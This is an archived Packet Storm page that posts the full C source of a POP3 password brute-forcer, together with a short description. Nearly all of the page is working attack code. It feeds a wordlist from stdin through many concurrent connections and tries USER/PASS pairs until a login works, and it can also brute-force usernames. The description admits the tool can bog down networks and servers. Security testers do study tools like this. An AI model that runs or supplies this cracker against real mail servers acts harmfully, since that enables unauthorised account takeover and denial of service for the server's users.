what you don't know can hurt you

POP3 Password Brute Forcer

POP3 Password Brute Forcer
Posted Jan 17, 2012
Authored by James Stevenson | Site stev.org

A small application built to test the performance of a pop3 authentication system using a lot of concurrent connections. It can also be used to try lots of password against a pop3 server. It is capable of using up to 1024 sessions (or more using multiple processes). However with this amount it is capable of reducing internet connections to a crawl and also greatly increasing the load on the server.

tags | tool, cracker
MD5 | 2080a9ffe1b5020963b555494ce64282

POP3 Password Brute Forcer

Change Mirror Download
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Library General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* $Id: brute-pop3.c,v 1.3 2011/12/08 20:48:39 james.stevenson Exp $
*
* Author:
* NAME: James Stevenson
* WWW: http://www.stev.org
* Usage:
* Compile : gcc -Wall -O2 brute-pop3.c -o brute-pop3
* Run : ./brute-pop3 -h
* Warning:
* using this will make your address appear in the log
* files like a very large 300 foot christmas tree
*/


#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <fcntl.h>
#include <time.h>
#include <errno.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/types.h>
#include <sys/time.h>

/* structs */
struct pop_conn {
int fd; /* connecting file descriptor */
int last; /* last time something was done */
int state;
char *cpass; /* current password we are working on */
struct sockaddr_in addr;
struct pop_conn *next; /* simple linked list */
};

/* Function defines */
int start_conn();
int run_q();
char *get_next();
int do_write(struct pop_conn *oldp, struct pop_conn *p);
int cleanup(struct pop_conn *oldp, struct pop_conn *p);
int pop3_expect(struct pop_conn *p);
void dump_stats();
unsigned long host2ip(char *hostname);
void print_usage(FILE *file, char *app);

/* Global vars */
struct pop_conn *conn = NULL; /* base of the linked list */
struct pop_conn *pass = NULL; /* dead passwords to retry */
char buf_word[4096]; /* buffer to read next password from stdin */

int brute_user = 0; /* brute the password or the username */
int verbose = 0; /* verbose mode */
int timeout = 30; /* timeout */

int conn_port = 110; /* default connection port */
char *conn_host = NULL; /* hostname */
char *conn_str = NULL; /* user || pass string */
unsigned long conn_ip = 0; /* host ip in network byte order */
int conn_max = 3; /* max sockets to use */
int conn_count = 0; /* number of active connections */
int conn_delay = 2; /* connection delay */

int highest_fd = 0; /* highest fd for select */
int last_connect = 0; /* do slow connections */
fd_set fd_read; /* read / write set */
fd_set fd_write;
int finished = 0;

/* Stats */
int stats = 60;
int stats_last = 0;
unsigned long long stats_connects = 0;
unsigned long long stats_reads = 0;
unsigned long long stats_writes = 0;
unsigned long long stats_trys = 0;
unsigned long long stats_timeouts = 0;

/* states for the login */
#define S_NONE 0
#define S_CONN 1
#define S_OK 2
#define S_USER 3
#define S_PASS 4

int main(int argc, char **argv) {
int c;
struct in_addr iaddr;

while(( c = getopt(argc, argv, "d:hm:up:s:t:v")) != -1) {
switch (c) {
case 'd':
conn_delay = atoi(optarg);
break;
case 'h':
print_usage(stdout, argv[0]);
exit(0);
break;
case 'm':
conn_max = atoi(optarg);
if (conn_max <= 0) {
fprintf(stderr, "max connection must be > 0\n");
exit(-1);
}
break;
case 'u':
brute_user = 1;
break;
case 'p':
conn_port = atoi(optarg);
if (conn_port > 65535 || conn_port == 0) {
fprintf(stderr, "Invalid port %d must be 1-65535\n", conn_port);
print_usage(stderr, argv[0]);
exit(-1);
}
break;
case 's':
stats = atoi(optarg);
break;
case 't':
timeout = atoi(optarg);
break;
case 'v':
verbose++;
break;
default:
break;
}
}

if (argc - optind < 2) {
print_usage(stderr, argv[0]);
exit(-1);
}
conn_host = argv[argc - 2];
conn_str = argv[argc - 1];

printf("Looking up Hostname: %s\n", conn_host);
conn_ip = host2ip(conn_host);
if (conn_ip == 0) {
printf("Failed to lookup host\n");
exit(-2);
}
iaddr.s_addr = conn_ip;
printf("Got: %s\n", inet_ntoa(iaddr));
printf("Using Port: %d\n", conn_port);
printf("Reading Mode: %s\n", brute_user ? "USERNAME" : "PASSWORD");
printf("Verbose Level: %d\n", verbose);
printf("Timeout: %d\n", timeout);
printf("Dump stats: %d\n", stats);
printf("Conn delay: %d\n", conn_delay);


/* this is where the fun starts :P */
FD_ZERO(&fd_write);
FD_ZERO(&fd_read);

stats_last = time(NULL);
while(1) {
if (conn_count < conn_max && time(NULL) > last_connect + 2) {
start_conn();
last_connect = time(NULL);
}
run_q();
if (time(NULL) > stats_last + stats) {
dump_stats();
stats_last = time(NULL);
}
if (finished && pass == NULL && conn == NULL) {
printf("Unable to get password\n");
dump_stats();
exit(2);
}
}

return 0;
}

int start_conn() {
struct pop_conn *p;

p = malloc(sizeof(*p));
if (!p) {
perror("malloc");
return -1;
}
bzero(p, sizeof(*p));

p->fd = socket(PF_INET, SOCK_STREAM, 0);
if (p->fd < 0) {
perror("socket");
free(p);
return -1;
}

if (fcntl(p->fd, F_SETFL, O_NONBLOCK) < 0) {
perror("fcntl");
close(p->fd);
free(p);
return -1;
}

p->last = time(NULL);
p->state = 0;

if (highest_fd <= p->fd)
highest_fd = p->fd + 1;

FD_SET(p->fd, &fd_read);
FD_SET(p->fd, &fd_write);

p->addr.sin_family = AF_INET;
p->addr.sin_port = htons(conn_port);
p->addr.sin_addr.s_addr = conn_ip;

if (connect(p->fd, (struct sockaddr *) &p->addr, sizeof(p->addr)) < 0) {
switch(errno) {
case EINPROGRESS:
case EAGAIN:
/* put onto linked list */
p->next = conn;
conn = p;
conn_count++;
stats_connects++;
return p->fd;
break;
default:
perror("connect");
break;
}
}
FD_CLR(p->fd, &fd_read);
FD_CLR(p->fd, &fd_write);
close(p->fd);
free(p);
return -1;
}

/* run the io Q */
int run_q() {
fd_set rfd, wfd;
struct timeval tv;
int ret;
struct pop_conn *p = conn, *oldp = NULL;
time_t ctime;

tv.tv_sec = 1;
tv.tv_usec = 0;
//re_select:
rfd = fd_read;
wfd = fd_write;
ret = select(highest_fd, &rfd, &wfd, NULL, &tv);
if (ret < 0) {
perror("select");
exit(-3);
}

ctime = time(NULL);
/* we have stuff to play with now */
while(p) {
if (FD_ISSET(p->fd, &wfd)) {
/* the connect succeeded */
FD_CLR(p->fd, &fd_write);
if (p->state != S_NONE)
printf("Error got write ok from select\n");
p->state = S_CONN;
p->last = ctime;
}
if (FD_ISSET(p->fd, &rfd)) {
if (p->state == S_NONE)
printf("Got read on none connected socket\n");
/* we are read to write data */
p->last = ctime;
if (do_write(oldp, p) < 0)
return 0;
}
if (p->last + timeout < ctime) {
stats_timeouts++;
printf("Timeout on %d\n", p->fd);
cleanup(oldp, p);
return 0;
}
oldp = p;
p = p->next;
}

return 0;
}

char *get_next() {
struct pop_conn *p;
char buf[1024];
char *tmp;
if (pass) {
p = pass;
tmp = p->cpass;
pass = p->next;
free(p);
return tmp;
}
if (fgets(&buf[0], sizeof(buf) - 1, stdin) == NULL) {
finished = 1;
return NULL;
}
buf[strlen(buf) - 1] = 0;
return strdup(buf);
}

int do_write(struct pop_conn *oldp, struct pop_conn *p) {
int ret;
char buf[1024];
int len;

switch(p->state) {
case S_NONE: /* this should not happen */
printf("Unreachable code in do_write\n");
break;
case S_CONN:
ret = pop3_expect(p);
if (ret == 0) return 0;
if (ret < 0) {
cleanup(oldp, p);
return -1;
}
p->state = S_OK;
return do_write(oldp, p);
break;
case S_OK:
if (brute_user) {
if (p->cpass)
free(p->cpass);
p->cpass = get_next();
if (!p->cpass) {
cleanup(oldp, p);
return -1;
}
len = sprintf(&buf[0], "USER %s\r\n", p->cpass);
p->state = S_USER;
if (write(p->fd, &buf[0], len) < 0) {
perror("write");
cleanup(oldp, p);
return -1;
}
stats_writes++;
} else {
len = sprintf(&buf[0], "USER %s\r\n", conn_str);
p->state = S_USER;
if (write(p->fd, &buf[0], len) < 0) {
perror("write");
cleanup(oldp, p);
return -1;
}
stats_writes++;
}
break;
case S_USER:
ret = pop3_expect(p);
if (ret == 0) return 0;
if (ret < 0) { /* it rejected out username ! */
cleanup(oldp, p);
return -2;
} else { /* lets write the password */
if (brute_user) {
len = sprintf(&buf[0], "PASS %s\r\n", conn_str);
p->state = S_PASS;
if (write(p->fd, &buf[0], len) < 0) {
perror("write");
cleanup(oldp, p);
return -1;
}
stats_writes++;
} else {
if (p->cpass)
free(p->cpass);
p->cpass = get_next();
if (!p->cpass) {
cleanup(oldp, p);
return -1;
}
len = sprintf(&buf[0], "PASS %s\r\n", p->cpass);
p->state = S_PASS;
if (write(p->fd, &buf[0], len) < 0) {
perror("write");
cleanup(oldp, p);
return -1;
}
stats_writes++;
}
}
break;
case S_PASS: /* find out if we got a login */
ret = pop3_expect(p);
if (ret == 0) return 0;
if (ret < 0) {
/* failed retry */
free(p->cpass);
p->cpass = NULL;
p->state = S_OK;
stats_trys++;
do_write(oldp, p);
} else {
if (brute_user) {
printf("Got User / Pass\n");
printf("User = %s\nPass = %s\n", conn_str, p->cpass);
} else {
printf("Got User / Pass");
printf("User = %s\nPass = %s\n", p->cpass, conn_str);
}
dump_stats();
exit(1);
}
break;
default:
printf("Unknown state code\n");
break;
}


return 0;
}

int cleanup(struct pop_conn *oldp, struct pop_conn *p) {
if (!oldp) {
conn = p->next;
} else {
oldp->next = p->next;
}
conn_count--;
FD_CLR(p->fd, &fd_write);
FD_CLR(p->fd, &fd_read);
close(p->fd);
if (p->cpass) {
p->next = pass;
pass = p;
} else {
free(p);
}
return 0;
}

/* returns > 0 on "+OK"
or < 0 on -ERR */
int pop3_expect(struct pop_conn *p) {
char buf[4096];
int ret;

ret = read(p->fd, &buf[0], sizeof(buf) - 2);
stats_reads++;
if (ret <= 0) {
switch (errno) {
case 0:
case EAGAIN:
return 0;
break;
case ECONNREFUSED:
printf("Got connection refused !!!\n");
FD_CLR(p->fd, &fd_read);
return 0;
break;
default:
perror("read");
FD_CLR(p->fd, &fd_read);
return 0;
break;
}
} else {
buf[ret + 1] = 0; /* make it NULL terminated */
}
if (strncmp("+OK", (const char *) &buf[0], 3) == 0)
return p->fd;
if (strncmp("-ERR", (const char *) &buf[0], 4) == 0)
return -p->fd;

printf("Unreachable code missed pop3 response\n");
printf("%d:%s\n", p->fd, &buf[0]);
return -1;
}

void dump_stats() {
printf("\n");
printf("Connects: %llu\n", stats_connects);
printf(" Reads: %llu\n", stats_reads);
printf(" Writes: %llu\n", stats_writes);
printf(" Trys: %llu\n", stats_trys);
printf("Timeouts: %llu\n", stats_timeouts);
printf("\n");
}

unsigned long host2ip(char *hostname) {
static struct in_addr i;
struct hostent *h;
i.s_addr = inet_addr(hostname);
if(i.s_addr == -1) {
h = gethostbyname(hostname);
if(h == NULL)
return 0;
bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
}
return i.s_addr;
}

void print_usage(FILE *file, char *app) {
fprintf(file, "Usage: %s [ options ] <host> <user>\n", app);
fprintf(file, "\n");
fprintf(file, "\t-d <n> delay between connections default: 2\n");
fprintf(file, "\t-h Print this stuff\n");
fprintf(file, "\t-m <n> Use n number of connections default: 3\n");
fprintf(file, "\t-p <port> use a different port number default: 110\n");
fprintf(file, "\t-u Instead of reading password use a constant\n");
fprintf(file, "\t password and brute users\n");
fprintf(file, "\t-s <n> dump stats every n seconds default: 60\n");
fprintf(file, "\t-t <n> set timeout to n seconds default: 30\n");
fprintf(file, "\t-v verbose mode repeat to increase\n");
fprintf(file, "\t\n");
fprintf(file, "\n");
return;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    22 Files
  • 20
    Mar 20th
    14 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    15 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close